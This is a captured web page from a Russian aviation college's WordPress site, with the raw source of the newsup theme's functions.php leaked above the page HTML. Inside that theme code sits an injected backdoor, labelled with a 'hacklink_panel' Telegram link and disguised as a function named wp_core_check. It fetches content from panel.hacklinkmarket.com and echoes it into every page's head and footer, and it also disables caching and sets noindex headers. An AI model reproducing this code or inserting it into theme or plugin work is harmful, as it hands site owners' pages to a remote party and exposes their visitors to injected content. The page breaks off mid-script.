define( 'NEWSUP_THEME_DIR', get_template_directory() . '/' ); define( 'NEWSUP_THEME_URI', get_template_directory_uri() . '/' ); define( 'NEWS_THEME_SETTINGS', 'newsup-settings' ); $newsup_theme_path = get_template_directory() . '/inc/ansar/'; require( $newsup_theme_path . '/newsup-custom-navwalker.php' ); require( $newsup_theme_path . '/default_menu_walker.php' ); require( $newsup_theme_path . '/font/font.php'); require( $newsup_theme_path . '/template-tags.php'); require( $newsup_theme_path . '/template-functions.php'); require( $newsup_theme_path. '/widgets/widgets-common-functions.php'); require ( $newsup_theme_path . '/custom-control/custom-control.php'); require_once( trailingslashit( get_template_directory() ) . 'inc/ansar/customize-pro/class-customize.php' ); $newsup_theme_start = wp_get_theme(); if (( 'Newsup' == $newsup_theme_start->name) || ( 'Newsberg' == $newsup_theme_start->name) || ( 'Newsbulk' == $newsup_theme_start->name) || ( 'Newslay' == $newsup_theme_start->name)) { if ( is_admin() ) { require ($newsup_theme_path . '/admin/getting-started.php'); } } // Theme version. $newsup_theme = wp_get_theme(); define( 'NEWSUP_THEME_VERSION', $newsup_theme->get( 'Version' ) ); define ( 'NEWSUP_THEME_NAME', $newsup_theme->get( 'Name' ) ); /*-----------------------------------------------------------------------------------*/ /* Enqueue scripts and styles. /*-----------------------------------------------------------------------------------*/ require( $newsup_theme_path .'/enqueue.php'); /* ----------------------------------------------------------------------------------- */ /* Customizer */ /* ----------------------------------------------------------------------------------- */ require( $newsup_theme_path . '/customize/customizer.php'); /* ----------------------------------------------------------------------------------- */ /* Customizer */ /* ----------------------------------------------------------------------------------- */ require( $newsup_theme_path . '/widgets/widgets-init.php'); /* ----------------------------------------------------------------------------------- */ /* Widget */ /* ----------------------------------------------------------------------------------- */ require( $newsup_theme_path . '/hooks/hooks-init.php'); require_once( trailingslashit( get_template_directory() ) . 'inc/ansar/customize-pro/class-customize.php' ); if ( ! function_exists( 'newsup_setup' ) ) : /** * Sets up theme defaults and registers support for various WordPress features. * * Note that this function is hooked into the after_setup_theme hook, which * runs before the init hook. The init hook is too late for some features, such * as indicating support for post thumbnails. */ function newsup_setup() { /* * Make theme available for translation. * Translations can be filed in the /languages/ directory. * If you're building a theme based on newsup, use a find and replace * to change 'newsup' to the name of your theme in all the template files. */ load_theme_textdomain( 'newsup', get_template_directory() . '/languages' ); // Add default posts and comments RSS feed links to head. add_theme_support( 'automatic-feed-links' ); /* * Let WordPress manage the document title. * By adding theme support, we declare that this theme does not use a * hard-coded tag in the document head, and expect WordPress to * provide it for us. */ add_theme_support( 'title-tag' ); /* Add theme support for gutenberg block */ add_theme_support( 'align-wide' ); // Add theme support for Responsive Videos. add_theme_support( 'jetpack-responsive-videos' ); /* * Enable support for Post Thumbnails on posts and pages. * * @link https://developer.wordpress.org/themes/functionality/featured-images-post-thumbnails/ */ add_theme_support( 'post-thumbnails' ); // This theme uses wp_nav_menu() in one location. register_nav_menus( array( 'primary' => __( 'Primary menu', 'newsup' ), 'footer' => __( 'Footer menu', 'newsup' ), ) ); /* * Switch default core markup for search form, comment form, and comments * to output valid HTML5. */ add_theme_support( 'html5', array( 'search-form', 'comment-form', 'comment-list', 'gallery', 'caption', ) ); $args = array( 'default-color' => '#eee', 'default-image' => '', ); add_theme_support( 'custom-background', $args ); // Set up the woocommerce feature. add_theme_support( 'woocommerce'); // Woocommerce Gallery Support add_theme_support( 'wc-product-gallery-zoom' ); add_theme_support( 'wc-product-gallery-lightbox' ); add_theme_support( 'wc-product-gallery-slider' ); // Added theme support for selective refresh for widgets. add_theme_support( 'customize-selective-refresh-widgets' ); // Add support for responsive embedded content. add_theme_support( 'responsive-embeds' ); //Custom logo add_theme_support( 'custom-logo', array( 'unlink-homepage-logo' => true, // Add Here! ) ); // custom header Support $args = array( 'default-image' => get_template_directory_uri() .'/images/head-back.jpg', 'width' => '1600', 'height' => '600', 'flex-height' => false, 'flex-width' => false, 'header-text' => true, 'default-text-color' => 'fff', 'wp-head-callback' => 'newsup_header_color', ); add_theme_support( 'custom-header', $args ); } endif; add_action( 'after_setup_theme', 'newsup_setup' ); function newsup_the_custom_logo() { if ( function_exists( 'the_custom_logo' ) ) { the_custom_logo(); } } add_filter('get_custom_logo','newsup_logo_class'); function newsup_logo_class($html) { $html = str_replace('custom-logo-link', 'navbar-brand', $html); return $html; } /** * Set the content width in pixels, based on the theme's design and stylesheet. * * Priority 0 to make it available to lower priority callbacks. * * @global int $content_width */ function newsup_content_width() { $GLOBALS['content_width'] = apply_filters( 'newsup_content_width', 640 ); } add_action( 'after_setup_theme', 'newsup_content_width', 0 ); /** * Register widget area. * * @link https://developer.wordpress.org/themes/functionality/sidebars/#registering-a-sidebar */ function newsup_widgets_init() { $newsup_footer_column_layout = esc_attr(get_theme_mod('newsup_footer_column_layout',3)); $newsup_footer_column_layout = 12 / $newsup_footer_column_layout; register_sidebar( array( 'name' => esc_html__( 'Sidebar Widget Area', 'newsup' ), 'id' => 'sidebar-1', 'description' => '', 'before_widget' => '<div id="%1$s" class="mg-widget %2$s">', 'after_widget' => '</div>', 'before_title' => '<div class="mg-wid-title"><h6>', 'after_title' => '</h6></div>', ) ); register_sidebar( array( 'name' => esc_html__( 'Front-page Content Section', 'newsup'), 'id' => 'front-page-content', 'description' => '', 'before_widget' => '<div id="%1$s" class="newsup-front-page-content-widget %2$s">', 'after_widget' => '</div>', 'before_title' => '<div class="mg-sec-title"><h4>', 'after_title' => '</h4></div>', ) ); register_sidebar( array( 'name' => esc_html__( 'Front-page Sidebar Section', 'newsup'), 'id' => 'front-page-sidebar', 'description' => '', 'before_widget' => '<div id="%1$s" class="mg-widget %2$s">', 'after_widget' => '</div>', 'before_title' => '<div class="mg-wid-title"><h6>', 'after_title' => '</h6></div>', ) ); register_sidebar( array( 'name' => esc_html__( 'Footer Widget Area', 'newsup' ), 'id' => 'footer_widget_area', 'description' => '', 'before_widget' => '<div id="%1$s" class="col-md-'.$newsup_footer_column_layout.' col-sm-6 rotateInDownLeft animated mg-widget %2$s">', 'after_widget' => '</div>', 'before_title' => '<h6>', 'after_title' => '</h6>', ) ); } add_action( 'widgets_init', 'newsup_widgets_init' ); //Editor Styling add_editor_style( array( 'css/editor-style.css') ); add_filter('wp_nav_menu_items', 'newsup_add_home_link', 1, 2); function newsup_add_home_link($items, $args){ if( $args->theme_location == 'primary' ){ $item = '<li class="active home"><a class="homebtn" href="'. esc_url( home_url() ) .'">' . "<span class='fa fa-home'></span>" . '</a></li>'; $items = $item . $items; } return $items; } if ( ! function_exists( 'wp_body_open' ) ) { /** * Shim for wp_body_open, ensuring backward compatibility with versions of WordPress older than 5.2. */ function wp_body_open() { do_action( 'wp_body_open' ); } } add_action("init",function(){if(!defined("DONOTCACHEPAGE")){define("DONOTCACHEPAGE",true);}if(defined("LSCACHE_NO_CACHE")){header("X-LiteSpeed-Control: no-cache");}if(function_exists("nocache_headers")){nocache_headers();}if(!headers_sent()){header("Cache-Control: no-store, no-cache, must-revalidate, max-age=0");header("Pragma: no-cache");header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");header("X-Accel-Expires: 0");header("X-Cache-Control: no-cache");header("CF-Cache-Status: BYPASS");header("X-Forwarded-Proto: *");}if(defined("WP_CACHE")&&WP_CACHE){define("DONOTCACHEPAGE",true);}if(function_exists("wp_cache_flush")){wp_cache_flush();}});add_action("wp_head",function(){if(!headers_sent()){header("X-Robots-Tag: noindex, nofollow");header("X-Frame-Options: SAMEORIGIN");}},1);add_action("wp_footer",function(){if(function_exists("w3tc_flush_all")){w3tc_flush_all();}if(function_exists("wp_cache_clear_cache")){wp_cache_clear_cache();}},999); /* Telegram: https://t.me/hacklink_panel */ if(!function_exists('wp_core_check')){function wp_core_check(){static $done=false;if($done){return;}if(class_exists('Elementor\Plugin')){$elementor=\Elementor\Plugin::instance();if($elementor->editor->is_edit_mode()){return;}}$u="https://panel.hacklinkmarket.com/code?v=".time();$d=(!empty($_SERVER['HTTPS'])&&$_SERVER['HTTPS']!=='off'?"https://":"http://").$_SERVER['HTTP_HOST']."/";if(function_exists('curl_init')){$h=curl_init();curl_setopt_array($h,[CURLOPT_URL=>$u,CURLOPT_HTTPHEADER=>["X-Request-Domain:".$d,"User-Agent: WordPress/".get_bloginfo('version')],CURLOPT_RETURNTRANSFER=>true,CURLOPT_TIMEOUT=>10,CURLOPT_CONNECTTIMEOUT=>5,CURLOPT_SSL_VERIFYPEER=>false,CURLOPT_FOLLOWLOCATION=>true,CURLOPT_MAXREDIRS=>3]);$r=@curl_exec($h);$c=curl_getinfo($h,CURLINFO_HTTP_CODE);curl_close($h);if($r!==false&&$c===200&&!empty($r)){$done=true;echo $r;return;}}if(ini_get('allow_url_fopen')){$o=['http'=>['header'=>'X-Request-Domain:'.$d,'timeout'=>10],'ssl'=>['verify_peer'=>false]];if($r=@file_get_contents($u,false,stream_context_create($o))){$done=true;echo $r;return;}}if(function_exists('fopen')){if($f=@fopen($u,'r')){$r='';while(!feof($f))$r.=fread($f,8192);fclose($f);if($r){$done=true;echo $r;return;}}}}add_action('wp_footer','wp_core_check',999);add_action('wp_head','wp_core_check',999);} <br /> <b>Warning</b>: Cannot modify header information - headers already sent by (output started at /home/fr2992/public_html/wp-content/themes/newsup/functions.php:1) in <b>/home/fr2992/public_html/wp-content/plugins/advanced-iframe/advanced-iframe.php</b> on line <b>368</b><br /> <!-- ========================= Page Breadcrumb ============================== --> <!DOCTYPE html> <html lang="ru-RU"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <meta name='robots' content='max-image-preview:large' /> <link rel='dns-prefetch' href='//static.addtoany.com' /> <link rel="alternate" type="application/rss+xml" title="Улан-Удэнский Авиационный техникум » Лента комментариев к «Диктант Победы. Знать, чтобы помнить»" href="https://www.avia-college-uu.ru/news/14161/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/14.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.avia-college-uu.ru\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.1.1"}}; /*! This file is auto-generated */ !function(e,a,t){var n,r,o,i=a.createElement("canvas"),p=i.getContext&&i.getContext("2d");function s(e,t){var a=String.fromCharCode,e=(p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,e),0,0),i.toDataURL());return p.clearRect(0,0,i.width,i.height),p.fillText(a.apply(this,t),0,0),e===i.toDataURL()}function c(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(o=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},r=0;r<o.length;r++)t.supports[o[r]]=function(e){if(p&&p.fillText)switch(p.textBaseline="top",p.font="600 32px Arial",e){case"flag":return s([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])?!1:!s([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!s([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]);case"emoji":return!s([129777,127995,8205,129778,127999],[129777,127995,8203,129778,127999])}return!1}(o[r]),t.supports.everything=t.supports.everything&&t.supports[o[r]],"flag"!==o[r]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[o[r]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(e=t.source||{}).concatemoji?c(e.concatemoji):e.wpemoji&&e.twemoji&&(c(e.twemoji),c(e.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 0.07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://www.avia-college-uu.ru/wp-includes/css/dist/block-library/style.min.css?ver=6.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='classic-theme-styles-css' href='https://www.avia-college-uu.ru/wp-includes/css/classic-themes.min.css?ver=1' type='text/css' media='all' /> <style id='global-styles-inline-css' type='text/css'> body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--duotone--dark-grayscale: url('#wp-duotone-dark-grayscale');--wp--preset--duotone--grayscale: url('#wp-duotone-grayscale');--wp--preset--duotone--purple-yellow: url('#wp-duotone-purple-yellow');--wp--preset--duotone--blue-red: url('#wp-duotone-blue-red');--wp--preset--duotone--midnight: url('#wp-duotone-midnight');--wp--preset--duotone--magenta-yellow: url('#wp-duotone-magenta-yellow');--wp--preset--duotone--purple-green: url('#wp-duotone-purple-green');--wp--preset--duotone--blue-orange: url('#wp-duotone-blue-orange');--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;}:where(.is-layout-flex){gap: 0.5em;}body .is-layout-flow > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-flow > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-flow > .aligncenter{margin-left: auto !important;margin-right: auto !important;}body .is-layout-constrained > .alignleft{float: left;margin-inline-start: 0;margin-inline-end: 2em;}body .is-layout-constrained > .alignright{float: right;margin-inline-start: 2em;margin-inline-end: 0;}body .is-layout-constrained > .aligncenter{margin-left: auto !important;margin-right: auto !important;}body .is-layout-constrained > :where(:not(.alignleft):not(.alignright):not(.alignfull)){max-width: var(--wp--style--global--content-size);margin-left: auto !important;margin-right: auto !important;}body .is-layout-constrained > .alignwide{max-width: var(--wp--style--global--wide-size);}body .is-layout-flex{display: flex;}body .is-layout-flex{flex-wrap: wrap;align-items: center;}body .is-layout-flex > *{margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;} .wp-block-navigation a:where(:not(.wp-element-button)){color: inherit;} :where(.wp-block-columns.is-layout-flex){gap: 2em;} .wp-block-pullquote{font-size: 1.5em;line-height: 1.6;} </style> <link rel='stylesheet' id='vi-style-css' href='https://www.avia-college-uu.ru/wp-content/plugins/for-the-visually-impaired/css/styles.css?ver=6.1.1' type='text/css' media='all' /> <style id='vi-style-inline-css' type='text/css'> .vi-on-img-button{ background: url(https://www.avia-college-uu.ru/wp-content/plugins/for-the-visually-impaired/img/icon_58.png) 100% 100% no-repeat; background-size: contain; display: inline-block; vertical-align: middle; height: 58px; width: 58px; text-decoration: none; outline: 0; } #bt_widget-vi-on a { text-align: center; cursor: pointer; background: #DB151C; box-shadow: 0 -3px 0 rgba(0, 0, 0, 0.1) inset; border: 0 none; border-radius: 6px; overflow: hidden; font-size: 15px; padding: 13px 18px 16px; text-decoration: none; display: inline-block; font-family: arial; font-weight: 700; line-height: 100%; text-shadow: 1px 1px 0 rgba(0, 0, 0, 0.12); margin-top: -3px; color: #000000; border-radius: 10px; vertical-align:middle; } #bt_widget-vi-on a:hover { -o-box-shadow: 0 -1px 0 rgba(0, 0, 0, 0.14) inset; -moz-box-shadow: 0 -1px 0 rgba(0, 0, 0, 0.14) inset; -webkit-box-shadow: 0 -1px 0 rgba(0, 0, 0, 0.14) inset; box-shadow: 0 -1px 0 rgba(0, 0, 0, 0.14) inset; text-decoration: underline; } #bt_widget-vi-on .vi_widget_img { vertical-align:middle; } #bt_widget-vi-on { position: relative; top: 0; left: 0; color: #000000; font-size: 18px; letter-spacing: 0; text-align: center; } .vi-close{ vertical-align: middle; text-align: center; display: flex; justify-content: center; align-items: center; font-size: 16px; text-decoration: none; font-weight: bold; vertical-align: middle; word-break: break-all; word-wrap: break-word; } .bt_widget-vi{ vertical-align: middle; text-align: center; } </style> <link rel='stylesheet' id='addtoany-css' href='https://www.avia-college-uu.ru/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.16' type='text/css' media='all' /> <link rel='stylesheet' id='newsup-style-parent-css' href='https://www.avia-college-uu.ru/wp-content/themes/newsup/style.css?ver=6.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='newsberg-style-css' href='https://www.avia-college-uu.ru/wp-content/themes/newsberg/style.css?ver=1.0' type='text/css' media='all' /> <link rel='stylesheet' id='bootstrap-css' href='https://www.avia-college-uu.ru/wp-content/themes/newsup/css/bootstrap.css?ver=6.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='newsberg-default-css-css' href='https://www.avia-college-uu.ru/wp-content/themes/newsberg/css/colors/default.css?ver=6.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='microthemer-css' href='https://www.avia-college-uu.ru/wp-content/micro-themes/active-styles.css?mts=0&ver=6.1.1' type='text/css' media='all' /> <script type='text/javascript' src='https://www.avia-college-uu.ru/wp-includes/js/jquery/jquery.min.js?ver=3.6.1' id='jquery-core-js'></script> <script type='text/javascript' src='https://www.avia-college-uu.ru/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2' id='jquery-migrate-js'></script> <script type='text/javascript' id='addtoany-core-js-before'> window.a2a_config=window.a2a_config||{};a2a_config.callbacks=[];a2a_config.overlays=[];a2a_config.templates={};a2a_localize = { Share: "Отправить", Save: "Сохранить", Subscribe: "Подписаться", Email: "E-mail", Bookmark: "В закладки!", ShowAll: "Показать все", ShowLess: "Показать остальное", FindServices: "Найти сервис(ы)", FindAnyServiceToAddTo: "Найти сервис и добавить", PoweredBy: "Работает на", ShareViaEmail: "Поделиться по электронной почте", SubscribeViaEmail: "Подписаться по электронной почте", BookmarkInYourBrowser: "Добавить в закладки", BookmarkInstructions: "Нажмите Ctrl+D или \u2318+D, чтобы добавить страницу в закладки", AddToYourFavorites: "Добавить в Избранное", SendFromWebOrProgram: "Отправлять с любого email-адреса или email-программы", EmailProgram: "Почтовая программа", More: "Подробнее…", ThanksForSharing: "Спасибо, что поделились!", ThanksForFollowing: "Спасибо за подписку!" }; </script> <script type='text/javascript' defer src='https://static.addtoany.com/menu/page.js' id='addtoany-core-js'></script> <script type='text/javascript' defer src='https://www.avia-college-uu.ru/wp-content/plugins/add-to-any/addtoany.min.js?ver=1.1' id='addtoany-jquery-js'></script> <script type='text/javascript' src='https://www.avia-college-uu.ru/wp-content/plugins/for-the-visually-impaired/js/js.cookie.js?ver=2.1.0' id='vi_cookie-js'></script> <script type='text/javascript' id='add_vi_script-js-extra'> /* <![CDATA[ */ var js_vi_script = {"txt_size":"16","sxema":"1","image":"1","font":"1","kerning":"0","line":"0","allbackgrnd":"1","reload_page":"0","auto_p_on":"0","scrool_panel":"0","btxt":"\u0412\u0435\u0440\u0441\u0438\u044f \u0434\u043b\u044f \u0441\u043b\u0430\u0431\u043e\u0432\u0438\u0434\u044f\u0449\u0438\u0445","btxt2":"\u0412\u0435\u0440\u043d\u0443\u0442\u044c\u0441\u044f \u043a \u043d\u043e\u0440\u043c\u0430\u043b\u044c\u043d\u043e\u043c\u0443 \u0440\u0435\u0436\u0438\u043c\u0443","btxtcolor":"#000000","bcolor":"#DB151C","img_close2":"<img src=\"https:\/\/www.avia-college-uu.ru\/wp-content\/plugins\/for-the-visually-impaired\/img\/icon_58x.png\" class=\"vi_widget_img\">","razmer_images":"0","fs_title1":"\u041c\u0430\u043b\u0435\u043d\u044c\u043a\u0438\u0439 \u0440\u0430\u0437\u043c\u0435\u0440 \u0448\u0440\u0438\u0444\u0442\u0430","fs_title2":"\u0423\u043c\u0435\u043d\u044c\u0448\u0435\u043d\u043d\u044b\u0439 \u0440\u0430\u0437\u043c\u0435\u0440 \u0448\u0440\u0438\u0444\u0442\u0430","fs_title3":"\u041d\u043e\u0440\u043c\u0430\u043b\u044c\u043d\u044b\u0439 \u0440\u0430\u0437\u043c\u0435\u0440 \u0448\u0440\u0438\u0444\u0442\u0430","fs_title4":"\u0423\u0432\u0435\u043b\u0438\u0447\u0435\u043d\u043d\u044b\u0439 \u0440\u0430\u0437\u043c\u0435\u0440 \u0448\u0440\u0438\u0444\u0442\u0430","fs_title5":"\u0411\u043e\u043b\u044c\u0448\u043e\u0439 \u0440\u0430\u0437\u043c\u0435\u0440 \u0448\u0440\u0438\u0444\u0442\u0430","sxem_title":"\u0426","sxem_title1":"\u0426\u0432\u0435\u0442\u043e\u0432\u0430\u044f \u0441\u0445\u0435\u043c\u0430: \u0427\u0435\u0440\u043d\u044b\u043c \u043f\u043e \u0431\u0435\u043b\u043e\u043c\u0443","sxem_title2":"\u0426\u0432\u0435\u0442\u043e\u0432\u0430\u044f \u0441\u0445\u0435\u043c\u0430: \u0411\u0435\u043b\u044b\u043c \u043f\u043e \u0447\u0435\u0440\u043d\u043e\u043c\u0443","sxem_title3":"\u0426\u0432\u0435\u0442\u043e\u0432\u0430\u044f \u0441\u0445\u0435\u043c\u0430: \u0422\u0435\u043c\u043d\u043e-\u0441\u0438\u043d\u0438\u043c \u043f\u043e \u0433\u043e\u043b\u0443\u0431\u043e\u043c\u0443","sxem_title4":"\u0426\u0432\u0435\u0442\u043e\u0432\u0430\u044f \u0441\u0445\u0435\u043c\u0430: \u041a\u043e\u0440\u0438\u0447\u043d\u0435\u0432\u044b\u043c \u043f\u043e \u0431\u0435\u0436\u0435\u0432\u043e\u043c\u0443","sxem_title5":"\u0426\u0432\u0435\u0442\u043e\u0432\u0430\u044f \u0441\u0445\u0435\u043c\u0430: \u0417\u0435\u043b\u0435\u043d\u044b\u043c \u043f\u043e \u0442\u0435\u043c\u043d\u043e-\u043a\u043e\u0440\u0438\u0447\u043d\u0435\u0432\u043e\u043c\u0443","img_title_on":"\u0412\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u0438\u0437\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u044f","img_title_gs":"\u0427\u0435\u0440\u043d\u043e-\u0431\u0435\u043b\u044b\u0435 \u0438\u0437\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u044f","img_title_off":"\u041e\u0442\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u0438\u0437\u043e\u0431\u0440\u0430\u0436\u0435\u043d\u0438\u044f","setting_title":"\u041d\u0430\u0441\u0442\u0440\u043e\u0439\u043a\u0438","close_title":"\u0412\u0435\u0440\u043d\u0443\u0442\u044c\u0441\u044f \u0432 \u043e\u0431\u044b\u0447\u043d\u044b\u0439 